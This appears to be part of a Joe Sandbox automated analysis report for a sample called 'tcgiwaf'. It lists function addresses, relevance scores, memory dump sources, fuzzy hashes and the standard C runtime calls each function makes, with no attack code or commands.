                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 0fe08e492a7b4ff5ea08ac429b4288c07587bbbeb0e40681d3b2b653b8e442b5
                                              • Instruction ID: 6f1f2b8560cac9da387ead87ac30bd7774921d8b2c3af18f7002eefdcb8e7388
                                              • Opcode Fuzzy Hash: 0fe08e492a7b4ff5ea08ac429b4288c07587bbbeb0e40681d3b2b653b8e442b5
                                              • Instruction Fuzzy Hash: E231DD31A00246EFCB20DF64C880EAA7BA5BF06310F15867BF461AB6E1D334DD85DB58
                                              Function 0040D78D Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction ID: 76e4944cf1066dc640bca3c999aabeb8e3301f05ae3b73433418f1691f27eaf4
                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction Fuzzy Hash: AD11833680014ABBCF125EC4CC41CEE3F26BB0C354B588426FE1869171C73BC9B5AB85
                                              Function 0040BF9F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0040BFAB
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 0040BFC2
                                              • __amsg_exit.LIBCMT ref: 0040BFD0
                                              • __lock.LIBCMT ref: 0040BFE0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 3521780317-0
                                              • Opcode ID: 9466699e1d6d4f156f53832724690a1e9375424cfaf0cbf22267286efaff49e4
                                              • Instruction ID: fb037f692e3fe67861f911b46272c7bec88e35a78bfb52665c800fbba86c3d7a
                                              • Opcode Fuzzy Hash: 9466699e1d6d4f156f53832724690a1e9375424cfaf0cbf22267286efaff49e4
                                              • Instruction Fuzzy Hash: E5F0FF36954705DAD720BB76884674A72A0EF40719F14427FE440B72D2DB7CA940CE9E
                                              Function 00403FA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: String_base::_Xlen_memcpy_sstd::_
                                              • String ID: h7@
                                              • API String ID: 923394732-1600037422
                                              • Opcode ID: 7af812c84f83da7910aacffbf650c5ec9dfb8aff5ddf6e7aab8b77b6688a95a4
                                              • Instruction ID: 9566f0d9c998b8a9578f3bf21b14740b123dbd66f40548be3c8be446b7403278
                                              • Opcode Fuzzy Hash: 7af812c84f83da7910aacffbf650c5ec9dfb8aff5ddf6e7aab8b77b6688a95a4
                                              • Instruction Fuzzy Hash: 1D3124727002008FDB24DE4CD58096BB7BAEFD2710710453FE266AB7D1D735AD4587A9
                                              Function 00404212 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: _memcpy_s
                                              • String ID: h7@$h7@
                                              • API String ID: 2001391462-3958829557
                                              • Opcode ID: 745f913652764fe60ef523a7c6abb404847c15f27414de6a6407b1a095ecf8ff
                                              • Instruction ID: b46eb664321361753e2a3a964793c2e7909d50a0e214324b60adf7b2a6979654
                                              • Opcode Fuzzy Hash: 745f913652764fe60ef523a7c6abb404847c15f27414de6a6407b1a095ecf8ff
                                              • Instruction Fuzzy Hash: 62014CB1610605AFD708DF59D580A6AB375FB85310F0041AEE92567781C739B950CBE9
                                              Function 00409F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405359: __getptd.LIBCMT ref: 0040535F
                                                • Part of subcall function 00405359: __getptd.LIBCMT ref: 0040536F
                                              • __getptd.LIBCMT ref: 00409F8F
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409F9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                              • String ID: csm
                                              • API String ID: 803148776-1018135373
                                              • Opcode ID: c0ce1d0d29b3558e020d2f3b56e83e559b5ab269ab1d48ab9c18dd40de057eb7
                                              • Instruction ID: 4600f6ba684a5a03787fd611c72d15dee9fc0ede12b87188f0516640ff6938b4
                                              • Opcode Fuzzy Hash: c0ce1d0d29b3558e020d2f3b56e83e559b5ab269ab1d48ab9c18dd40de057eb7
                                              • Instruction Fuzzy Hash: 4C014636801206CACF38AF25C4946AEB7B5AF14311F68443FF448B66D2DB388D80EF49